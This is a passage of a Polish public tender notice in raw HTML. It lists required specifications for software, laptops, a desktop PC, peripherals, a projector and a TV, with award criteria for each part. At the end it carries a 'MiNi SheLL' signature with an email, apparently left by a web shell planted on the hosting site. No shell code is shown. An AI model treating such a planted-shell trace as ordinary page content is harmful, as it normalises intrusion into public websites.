style="border: 1px solid black;border-collapse: collapse;">10</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa Soft - oprogramowanie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: OPROGRAMOWANIE SYSTEMOWE Soft1	ILOŚĆ: 1 szt.Wymagane parametrySYSTEM OPERACYJNY: Microsoft Windows 10 BOX OEMASORTYMENT 2: OPROGRAMOWANIE SYSTEMOWE Soft2	ILOŚĆ: 1 szt.Wymagane parametrySYSTEM OPERACYJNY: Microsoft Windows 10 Pro MOLP EDU (upgrade)ASORTYMENT 3: OPROGRAMOWANIE BIUROWE Soft3	ILOŚĆ: 14 szt.Wymagane parametryOPROGRAMOWANIE BIUROWE: Microsoft Office 2016 Standard MOLP AESzczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.Zamawiający zastrzega sobie prawo do zwiększenia zapotrzebowania ilościowego (opcja), w ten sposób, że będzie miał prawo zakupu wybranego przedmiotu (lub wybranych przedmiotów) w ramach części zamówienia, przy czym łączna wartość zamówienia dodatkowego nie może przekroczyć 30% wartości tej części. W sytuacji, gdy Zamawiający będzie chciał skorzystać z prawa opcji zwróci się pisemnie do Wykonawcy z wnioskiem o dostarczenie wskazanego przedmiotu. Wykonawca będzie zobowiązany dostarczyć przedmiot zamówienia w terminie obowiązującym dla danej części zamówienia na warunkach określonych w umowie, SIWZ oraz złożonej ofercie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>48000000-8, 48900000-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa P - komputery przenośne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: KOMPUTER PRZENOŚNY P1	ILOŚĆ: 1 szt.Wymagane parametryProcesor: liczba rdzeni 4, liczba wątków 8, cache 6MB, zestaw instrukcji 64 bitowy, maksymalna znamionowa moc termiczna 45W, wydajność obliczeniowa CPU wg PassMark - CPU Mark nie mniejsza niż 8952, lub lepszyPamięć RAM: 32 GB lub więcejKarta graficzna: dedykowana, Ekran: 15,6 cali, 1920x1080Dysk SSD:	- 1 x dysk SSD M.2 256GB lub o większej pojemności,- 1 x dysk SSD SATA 512GB lub o większej pojemności (MLC (2-bit), MTBF>=2mln godz., zapis >=520MB/s), 10 lat gwarancji.Złącza: minimum 3 porty USB 3.0, obsługa kart pamięci SD, wbudowana kamera 1Mpix lub o większej rozdzielczościSystem operacyjny: Microsoft Windows 10 PRO PL (64 bitowy)Wymagana gwarancja: producenta, 36 miesięcy on-siteASORTYMENT 2: KOMPUTER PRZENOŚNY P2	ILOŚĆ: 1 szt.Wymagane parametryProcesor: liczba rdzeni 2, liczba wątków 4, cache 3MB, zestaw instrukcji 64 bitowy, maksymalna znamionowa moc termiczna 28W, wydajność obliczeniowa CPU wg PassMark - CPU Mark nie mniejsza niż 4715, lub lepszyPamięć RAM: 12 GB DDR4 lub więcejEkran: 14,1" 1920x1080, matryca IPS, powierzchnia matowaDysk SSD: 1 x dysk SSD M.2 512GB lub o większej pojemnościZłącza: HDMI, minimum 3 porty USB 3.0, wbudowana kamera 1Mpix lub o większej rozdzielczości, wbudowana karta sieciowa 1Gbit Waga: <= 1,4 kgSystem operacyjny: Microsoft Windows 10 PRO PL (64 bitowy)Wymagana gwarancja: producenta, wymagana 36 miesięcy on-site ASORTYMENT 3: KOMPUTER PRZENOŚNY P3	ILOŚĆ: 1 szt.Wymagane parametryProcesor: liczba rdzeni 2, liczba wątków 4, 3MB cache, zestaw instrukcji 64 bitowy, maksymalna znamionowa moc termiczna 28W, wydajność obliczeniowa CPU wg PassMark - CPU Mark nie mniejsza niż 4715, lub lepszyPamięć RAM: 8 GB DDR4 lub więcejEkran: 14" 1920x1080, matryca o powierzchni matowejKarta graficzna: dedykowana, 2GB pamięci własnej lub więcejDyski: 512GB M.2 SSD lub o większej pojemności, możliwość montażu drugiego dysku SATAZłącza: HDMI, VGA, minimum 3 porty USB 3.0, wbudowana kamera 1Mpix lub o większej rozdzielczości, wbudowana karta sieciowa 1Gbit Waga: < =1,7 kgSystem operacyjny: Microsoft Windows 10 PRO PL (64 bitowy)Wymagana gwarancja: producenta, 36 miesięcy on-siteASORTYMENT 4: KOMPUTER PRZENOŚNY P4	ILOŚĆ: 2 szt.Wymagane parametryProcesor: liczba rdzeni 2, liczba wątków 4, 3MB cache, zestaw instrukcji 64 bitowy, maksymalna znamionowa moc termiczna 28W, wydajność obliczeniowa CPU wg PassMark - CPU Mark nie mniejsza niż 4715, lub lepszyPamięć RAM: 8 GB DDR4 lub więcejEkran: 14,1", rozdzielczość 1366x768 lub większaDysk SSD: 1 x dysk SSD M.2 256GB lub o większej pojemnościZłącza: wbudowana kamera 1Mpix lub o większej rozdzielczości, wbudowana karta sieciowa 1Gbit Waga: <= 1,7 kgSystem operacyjny: Microsoft Windows 10 PRO PL (64 bitowy)Wymagana gwarancja: producenta, 36 miesięcy on-siteSzczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30213100-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">jakość</td><td style="border: 1px solid black;border-collapse: collapse;">20</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa S - komputer stacjonarny oraz grupa asortymentowa EA - elementy systemów komputerowych i akcesoria</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: KOMPUTER STACJONARNY S1	ILOŚĆ: 1 szt.Wymagane parametryWykonanie: Brand ,,A"Procesor: rdzeni 4, wątków 8, cache 6 MB, zestaw instrukcji 64 bitowy, maksymalna znamionowa moc termiczna 45W, wydajność obliczeniowa CPU wg PassMark - CPU Mark nie mniejsza niż 10943, lub lepszy.Pamięć RAM: 16GB DDR4 2400MHz (w jednym module),Dysk: SSD SATA 512GB lub o większej pojemności(MLC (2-bit), MTBF >=2mln godz., Zapis>=520MB/s), 10 lat gwarancji.Karta graficzna: dedykowana z dedykowaną pamięcią, złącze HDMI, wydajność G3D Mark nie mniej niż 3046.Karta sieciowa: 1Gbit/s na płycie głównej,Audio: zintegrowane na płycie głównej, złącza audio z przodu i z tyłu obudowy (głośniki + mikrofon)Bluetooth: takObudowa: typu tower- czytnik kart pamięci- minimum 6 złącz USB, w tym minimum 2 złącza USB 3.0 z przodu obudowySystem operacyjny: Microsoft Windows 10 PRO PLNapęd optyczny: DVD +/- RWGwarancja wymagana: producenta, 36 miesięcy ASORTYMENT 2: DYSK ZEWNĘTRZNY EA1	ILOŚĆ: 1 szt.Wymagane parametryPojemność: 3 TB; Typ dysku: HDD 3,5"; Interfejs: USB 3.0Przeznaczenie: desktop, zewnętrzne zasilanieGwarancja wymagana: producenta, 24 miesiąceASORTYMENT 3: DYSK ZEWNĘTRZNY EA2	ILOŚĆ: 2 szt.Wymagane parametryPojemność: 1 TB; Typ dysku: HDD 2,5"; Interfejs: USB 3.0Przeznaczenie: przenośny, bez dodatkowego zasilaniaGwarancja wymagana: producenta, 24 miesiąceASORTYMENT 4: DYSK ZEWNĘTRZNY EA3	ILOŚĆ: 1 szt.Wymagane parametryPojemność: 2 TB; Typ dysku: HDD 2,5"; Interfejs: USB 3.0Przeznaczenie: przenośny, bez dodatkowego zasilania Gwarancja wymagana: producenta, 24 miesiąceASORTYMENT 5: MONITOR LCD 24" EA4	ILOŚĆ: 2 szt.Wymagane parametryPrzekątna ekranu 24" ?0,5"Format obrazu 16 : 9 Panel IPS LEDRozdzielczość fizyczna 1920 x 1080Jasność 250 cd/m2Kontrast 1000 : 1 typowy Czas reakcji 5 ms Kąt widzenia CR>10 178°/ 178° Wyświetlane kolory 16.7 mln Wielkość plamki <=0.28 mm Interfejsy	DVI-D, HDMI, DisplayPortGłośniki	stereo, wbudowane, min 20WGwarancja wymagana: producenta, 36 miesięcyASORTYMENT 6: ZESTAW KLAWIATURA+MYSZ EA5	ILOŚĆ: 2 szt.Wymagane parametryKlawiatura przewodowa USB, mysz optyczna przewodowa USB, długość przewodu myszy powyżej 1,5 m, do profesjonalnych zastosowań biurowychGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 7: KLAWIATURA PRZEWODOWA USB EA6	ILOŚĆ: 5 szt.Wymagane parametryKlawiatura przewodowa USB do profesjonalnych zastosowań biurowychGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 8: MYSZ OPTYCZNA PRZEWODOWA USB EA7	ILOŚĆ: 3 szt.Wymagane parametryMysz optyczna przewodowa, przewód o długości nie mniej niż 1,8 m, interfejs USB, rolkaGwarancja wymagana: producenta, 12 miesięcy ASORTYMENT 9: MYSZ LASEROWA PRZEWODOWA EA8	ILOŚĆ: 2 szt.Wymagane parametryMysz laserowa przewodowa, interfejs USB, 3 przyciski, rolka, pożądana funkcja przewijania w poziomie, pożądana długość kabla powyżej 1,5 mGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 10: MYSZ LASEROWA PRZEWODOWA USB EA9	ILOŚĆ: 1 szt.Wymagane parametryMysz laserowa z laserem niewidocznym, przewodowa z przewodem o długości nie mniej niż 1,8 m, interfejs USB, rozdzielczość 1000, 7 przycisków, rolka, funkcja przewijania w poziomie.Gwarancja wymagana: producenta, 12 miesięcyASORTYMENT 11: MYSZ OPTYCZNA BEZPRZEWODOWA USB EA10	ILOŚĆ: 5 szt.Wymagane parametryMysz optyczna bezprzewodowa, interfejs USB, 3 przyciski, rolka, rozdzielczość 1000, bateria 1x AA, żywotność baterii do 12 miesięcy, waga myszy z baterią poniżej 80 gGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 12: MYSZ OPTYCZNA BEZPRZEWODOWA EA11	ILOŚĆ: 2 szt.Wymagane parametryMysz optyczna bezprzewodowa, interfejs USB, rozdzielczość 1000, 5 przycisków, rolka, funkcja przewijania w poziomie, bateria 1x AA, żywotność baterii do 18 miesięcyGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 13: MYSZ OPTYCZNA BEZPRZEWODOWA EA12	ILOŚĆ: 5 szt.Wymagane parametryMysz optyczna bezprzewodowa do komputerów przenośnych (mini), interfejs USB, 3 przyciski, rolka, rozdzielczość 1000, bateria 1x AAA, waga myszy z bateria poniżej 55gGwarancja wymagana: producenta, 12 miesięcyASORTYMENT 14: PAMIĘĆ PENDRIVE 16GB EA13	ILOŚĆ: 5 szt.Wymagane parametryPojemność: 16 GB; Odczyt: do 130 MB/s; Zapis: do 60 MB/s;Obudowa metalowa, złącze USB chowane w obudowieGwarancja wymagana: producenta, 36 miesięcyASORTYMENT 15: PAMIĘĆ PENDRIVE 32GB EA14	ILOŚĆ: 3 szt.Wymagane parametryPojemność: 32 GB; Odczyt: do 150 MB/s; Zapis: do 60 MB/s;Obudowa metalowa, złącze USB chowane w obudowieGwarancja wymagana: producenta, 36 miesięcyASORTYMENT 16: PAMIĘĆ PENDRIVE 64GB EA15	ILOŚĆ: 5 szt.Wymagane parametryPojemność: 64 GB; Odczyt: do 150 MB/s; Zapis: do 60 MB/s;Obudowa metalowa, złącze USB chowane w obudowieGwarancja wymagana: producenta, 36 miesięcyASORTYMENT 17: PAMIĘĆ PENDRIVE 128GB EA16	ILOŚĆ: 2 szt.Wymagane parametryPojemność: 128 GB; Odczyt: do 150 MB/s; Zapis: do 60 MB/s;Obudowa metalowa, złącze USB chowane w obudowie.	Gwarancja wymagana: producenta, 36 miesięcy ASORTYMENT 18: KABEL USB EA17	ILOŚĆ: 5 szt.Wymagane parametryPrzedłużacz USB 3.0 AM-AF 1,8m	ASORTYMENT 19: KABEL USB EA18	ILOŚĆ: 5 szt.Wymagane parametryPrzedłużacz USB 2.0 AM-AF 1,8mASORTYMENT 20: KABEL USB EA19	ILOŚĆ: 2 szt.Wymagane parametryKabel do drukarki USB 2.0 AM-BM 1,8mSzczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.Zamawiający zastrzega sobie prawo do zwiększenia zapotrzebowania ilościowego (opcja), w ten sposób, że będzie miał prawo zakupu wybranego przedmiotu (lub wybranych przedmiotów) w ramach części zamówienia, przy czym łączna wartość zamówienia dodatkowego nie może przekroczyć 30% wartości tej części. W sytuacji, gdy Zamawiający będzie chciał skorzystać z prawa opcji zwróci się pisemnie do Wykonawcy z wnioskiem o dostarczenie wskazanego przedmiotu. Wykonawca będzie zobowiązany dostarczyć przedmiot zamówienia w terminie obowiązującym dla danej części zamówienia na warunkach określonych w umowie, SIWZ oraz złożonej ofercie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30213000-5, 30231300-0, 30233132-5, 30233180-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">20</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa V - urządzenia do prezentacji multimedialnych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: Wideoprojektor V1	ILOŚĆ: 1 kpl.Wymagane parametrySystem projekcyjny: technologia 3LCDNatężenie światła barwnego i białego: nie mniej niż 4400 lumenówRozdzielczość: 1920x 1200 (16:10)Stosunek kontrastu: 10000:1Układ optyczny: zoom 1 - 1.6 lub więcej,Rozmiar projekcji: w zakresie co najmniej 50" ÷ 100"Interfejsy: o	Ethernet (10/100 lub lepiej), o	wejście HDMI 2x lub więcej, o	wejście VGA 2x lub więcej.Akcesoria:o	kabel HDMI 1.4 (m-m) 20m - 1 szt.o	kabel HDMI 1.4 (m-m) 5m - 1 szt.o	kabel VGA (m-m) 5m - 1 szt.o	zestaw gniazd 1x HDMI(ż - ż), 1x VGA(ż - ż) z puszką (puszkami) do montażu (natynkowego lub podtynkowego) - 1 kpl.Gwarancja wymagana: producenta, 36 miesięcySzczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>38000000-5, 38652120-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">jakość</td><td style="border: 1px solid black;border-collapse: collapse;">20</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa T - telewizory </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: Telewizor/wyświetlacz do prezentacji T1	ILOŚĆ: 1 szt.Wymagane parametryprzekątna ekranu	55"rozdzielczość	3840 × 2160kształt ekranu	płaskitunery	DVB-T, analogowyfunkcja Smart TV	wymaganeliczba złączy HDMI	nie mniej niż 3Liczba złączy USB	nie mniej niż 2Ethernet (LAN)	wymagane, WLANWyświetlanie z aplikacji na smartfonie	wymaganeKlasa energetyczna	AGwarancja wymagana: producenta, 12 miesięcySzczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>32000000-3, 32324600-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">20</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com